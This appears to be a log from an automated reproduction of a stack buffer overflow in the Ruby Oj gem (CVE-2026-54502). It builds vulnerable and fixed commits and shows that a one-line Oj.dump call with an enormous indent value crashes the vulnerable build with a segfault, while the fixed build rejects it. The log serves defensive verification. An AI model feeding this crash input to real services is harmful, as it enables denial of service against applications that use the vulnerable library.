=== Oj stack buffer overflow reproduction (CVE-2026-54502) === ROOT=/data/pruva/runs/d11e15df-2ae7-42be-b98d-398ba7d8e0c5/bundle SOURCE_REPO=/data/pruva/project-cache/dc167dac-a6d2-43f6-837d-84c9d571596f/repo VULN_COMMIT=4587e87e23adc9a4163834dc8c9ba9d7206c6501 FIXED_COMMIT=ec368dbe936ef0104b782e4b0f67b17d6c7276f7 ruby 3.3.8 (2025-04-09 revision b200bad6cd) [x86_64-linux-gnu] Updating vulnerable copy... Updating fixed copy... Building vulnerable at 4587e87e23adc9a4163834dc8c9ba9d7206c6501... HEAD is now at 4587e87 Fix reentrant parser (#1013) >>>>> Creating Makefile for ruby version 3.3.8 on x86_64-linux-gnu <<<<< checking for rb_gc_mark_movable()... yes checking for stpcpy()... yes checking for pthread_mutex_init()... yes checking for getrlimit() in sys/resource.h... yes checking for rb_enc_interned_str()... yes checking for rb_ext_ractor_safe() in ruby.h... yes creating Makefile compiling cache.c compiling cache8.c compiling circarray.c compiling code.c compiling compat.c compiling custom.c compiling debug.c compiling dump.c compiling dump_compat.c compiling dump_leaf.c compiling dump_object.c compiling dump_strict.c compiling err.c compiling fast.c compiling intern.c compiling mem.c compiling mimic_json.c compiling object.c compiling odd.c compiling oj.c oj.c: In function 'only_array_from_string': oj.c:255:28: warning: assignment discards 'const' qualifier from pointer target type [-Wdiscarded-qualifiers] 255 | while (NULL != (cp = strchr(str, ':'))) { | ^ compiling parse.c compiling parser.c compiling rails.c compiling reader.c compiling resolve.c compiling rxclass.c compiling safe.c compiling saj.c compiling saj2.c compiling scp.c compiling sparse.c compiling stream_writer.c compiling strict.c compiling string_writer.c compiling trace.c compiling usual.c compiling util.c compiling val_stack.c compiling validate.c compiling wab.c linking shared-object oj/oj.so Running vulnerable test... /data/pruva/runs/d11e15df-2ae7-42be-b98d-398ba7d8e0c5/bundle/repro/reproduction_steps.sh: line 98: 3769 Segmentation fault (core dumped) ruby -I"$dir/lib" -e "require 'oj'; puts Oj::VERSION; Oj.dump({a: 1}, indent: 2147483647); puts 'no crash'" > "$log" 2>&1 vulnerable exit code: 139 vulnerable: SIGSEGV observed (exit 139) Building fixed at ec368dbe936ef0104b782e4b0f67b17d6c7276f7... HEAD is now at ec368db Fix stack limits (#1014) >>>>> Creating Makefile for ruby version 3.3.8 on x86_64-linux-gnu <<<<< checking for rb_gc_mark_movable()... yes checking for stpcpy()... yes checking for pthread_mutex_init()... yes checking for getrlimit() in sys/resource.h... yes checking for rb_enc_interned_str()... yes checking for rb_ext_ractor_safe() in ruby.h... yes creating Makefile compiling cache.c compiling cache8.c compiling circarray.c compiling code.c compiling compat.c compiling custom.c compiling debug.c compiling dump.c compiling dump_compat.c compiling dump_leaf.c compiling dump_object.c compiling dump_strict.c compiling err.c compiling fast.c compiling intern.c compiling mem.c compiling mimic_json.c compiling object.c compiling odd.c compiling oj.c oj.c: In function 'only_array_from_string': oj.c:257:28: warning: assignment discards 'const' qualifier from pointer target type [-Wdiscarded-qualifiers] 257 | while (NULL != (cp = strchr(str, ':'))) { | ^ compiling parse.c compiling parser.c compiling rails.c compiling reader.c compiling resolve.c compiling rxclass.c compiling safe.c compiling saj.c compiling saj2.c compiling scp.c compiling sparse.c compiling stream_writer.c compiling strict.c compiling string_writer.c compiling trace.c compiling usual.c compiling util.c compiling val_stack.c compiling validate.c compiling wab.c linking shared-object oj/oj.so Running fixed test... fixed exit code: 1 fixed: ArgumentError (indent rejected) observed VULN_RESULT=0 FIXED_RESULT=1 CONFIRMED: vulnerable version crashes with SIGSEGV, fixed version does not.